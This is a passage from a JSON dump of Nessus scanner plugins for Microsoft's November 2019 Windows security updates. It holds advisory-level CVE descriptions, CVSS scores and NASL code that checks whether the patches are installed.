Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2019-1392)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525246.NASL", "href": "https://www.tenable.com/plugins/nessus/130910", "published": "2019-11-12T00:00:00", "title": "KB4525253: Windows Server 2012 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130910);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/12/30\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1384\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1392\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1412\",\n \"CVE-2019-1415\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1429\",\n \"CVE-2019-1432\",\n \"CVE-2019-1433\",\n \"CVE-2019-1434\",\n \"CVE-2019-1435\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525253\");\n script_xref(name:\"MSKB\", value:\"4525246\");\n script_xref(name:\"MSFT\", value:\"MS19-4525253\");\n script_xref(name:\"MSFT\", value:\"MS19-4525246\");\n\n script_name(english:\"KB4525253: Windows Server 2012 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525253\nor cumulative update 4525246. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when \n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2019-1392)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\");\n # https://support.microsoft.com/en-us/help/4525253/windows-server-2012-update-kb4525253\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34c18afd\");\n # https://support.microsoft.com/en-us/help/4525246/windows-server-2012-update-kb4525246\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad214b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4525253 or Cumulative Update KB4525246.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525253', '4525246');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525253, 4525246])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:09", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525233\nor cumulative update 4525235. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1441)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525235.NASL", "href": "https://www.tenable.com/plugins/nessus/130905", "published": "2019-11-12T00:00:00", "title": "KB4525233: Windows 7 and Windows Server 2008 R2 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130905);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/12/30\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-1382\",\n \"CVE-2019-1384\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1412\",\n \"CVE-2019-1415\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1429\",\n \"CVE-2019-1432\",\n \"CVE-2019-1433\",\n \"CVE-2019-1434\",\n \"CVE-2019-1435\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1441\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525235\");\n script_xref(name:\"MSKB\", value:\"4525233\");\n script_xref(name:\"MSFT\", value:\"MS19-4525235\");\n script_xref(name:\"MSFT\", value:\"MS19-4525233\");\n\n script_name(english:\"KB4525233: Windows 7 and Windows Server 2008 R2 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525233\nor cumulative update 4525235. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who 